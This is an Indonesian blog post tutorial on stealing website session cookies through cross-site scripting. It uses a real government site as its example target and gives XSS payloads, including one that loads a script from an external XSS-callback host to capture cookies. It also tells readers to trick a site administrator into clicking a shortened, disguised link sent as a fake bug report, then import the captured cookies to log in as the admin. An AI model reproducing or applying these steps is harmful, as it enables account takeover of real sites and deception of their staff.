Cookie adalah serpihan data kecil yang disimpan di dalam komputer hasil dari pengiriman website yang telah menggunakan akses sebelumnya.
Singkatnya Cookie seperti jejak digital tapi cookie juga bisa dimanfaatkan oleh orang-orang untuk mendapatkan akses jadi lindungilah cookie kalian:v
Situs web menggunakan cookie HTTP atau cookie browser untuk memudahkan pengguna. Misalnya, tanpa cookie, pengguna harus login lagi setelah meninggalkan situs
Cookie browser disebut juga cookie sederhana, cookie internet, cookie web atau cookie HTTP.Contoh
Kamu punya akun dari suatu website yang sudah login, Jika orang lain dapat cookie mu dari website itu dan memasukkan cookie mu ke browser nya maka orang itu dapat login ke akunmu tanpa memasukkan username dan password.
Gini lah kerjanya
Andi login ke website https://syborgcate.com menggunakan akunnya dan hacker menemukan bug xss di syborgcate.com,kalian tau payload untuk melihat cookie?ini payloadnya https://syborgcate.com/q?=<script>alert(document.cookie) maka akan seperti ini
Note : Jika gambar buram bisa kalian klik gambarnya atau zoom biar kelihatan,jika tidak bisa di klik kalian aktifkan dulu mode desktop nya baru bisa di klik
jika si hacker kirim payload https://syborgcate.com/q?=<script>alert(document.cookie)</script> ke Andi dan si hacker suruh Andi foto cookie nya lalu si hacker manfaatkan ke browser maka hacker akan otomatis login ke akun Andi tanpa memasukan username dan password.
Oke gini cara gunakannya
Pertama cari web vuln XSS
https://www.indonesia.go.id/ Oke ini web vuln XSS
hmm coba kita tes masukin payload <script>alert(document.cookie)</script> dulu
Nah itu document cookie nya
_ga=GA1.3.1930403951.1622281688; _
gid=GA1.3.333175437.1622281688;
__asc=ca22693d179b7861458e31d5b16;
__auc=ca22693d179b7861458e31d5b16;
_gat_gtag_UA_129665022_1=1
Tiap web kadang beda" jadi ga perlu disamain kek diatas
Terus kalian ke add-ons download cookies editor aku make cookies editor di firefox kalo di chrome ga ketemu.
Nah anggap aja saya admin dan diatas itu adalah cookie dari admin
Anggap aja si hacker mau ngambil cookie adminnya,jadi pas hacker dapat cookie adminnya si hacker bisa memakai nya dan otomatis si hacker langsung jadi admin
Gini carana
Pertama cari web vuln XSS diatas sudah ada
Kedua kalian buka website https://xsshunter.com/app
Ketiga login jika belum punya akun daftar
Keempat kalian ke https://xsshunter.com/app klik Payloads dan akan muncul seperti ini
Kelima kalian pilih salah satu terserah.disini saya memilih yang pertama "><script src=https://zyrus.xss.ht></script> dan tinggal di tempelkan ke kolom search nya atau url nya
jadi linknya ini https://www.indonesia.go.id/search?keyword="><script src=https://zyrus.xss.ht></script>
Dan target kita kan mendapat cookie admin bagaimana caranya?caranya kita harus nyuruh si admin untuk membuka link https://www.indonesia.go.id/search?keyword="><script src=https://zyrus.xss.ht></script> caranya nyuruhnya?ada banyak cara disini saya gunakan cara report bug yaitu kalian chat email atau kontak adminnya,cek postingan ini bagaiaman cara mendapatkan email admin/staff website jika sudah dapat kalian harus samarkan dulu link nya agar admin tidak curiga bisa kalian gunakan URL shortener di google banyak disini saya gunakan https://cutt.ly/ jadinya seperti ini https://tinyurl.com/ta4vv3rf jadi tinggal buat laporan bug dan kasih link itu ke admin agar admin membukanya.Jika sudah dibuka kalian cek lagi di https://xsshunter.com/app dann
Jika admin mengklik maka otomatis cookie nya muncul disitu ip nya diawali 114 ini cookienya
Ini cookie adminnya
_ga=GA1.3.2038784007.1616654458;
_gid=GA1.3.560411359.1616654458;
__asc=7855848f178681d5c8bd9269078;
__auc=7855848f178681d5c8bd9269078;
_gat_gtag_UA_129665022_1=1
dan download add-ons cookie editor
Nah seperti gambar diatas tampilan dari cookies editor tinggal kita isi deh dari cookie admin ini
_ga=GA1.3.2038784007.1616654458;
_gid=GA1.3.560411359.1616654458;
__asc=7855848f178681d5c8bd9269078;
__auc=7855848f178681d5c8bd9269078;
_gat_gtag_UA_129665022_1=1
kita isi __ga nya GA1.3.2038784007.1616654458 lalu klik tombol save disamping kiri itu
Dan begitu seterusnya jika sudah terisi semua kalian refresh dan otomatis kalian jadi admin di web itu.
Tapi cookie itu punya waktu limit nya,waktu limit nya juga terlalu singkat itu tergantung admin nya juga jika adminnya stay di link yg kalian kasi maka akan terus aktif,Jika ditutup otomatis cookie itu tidak bisa dipake lagi.
~Terima Kasih
0 Komentar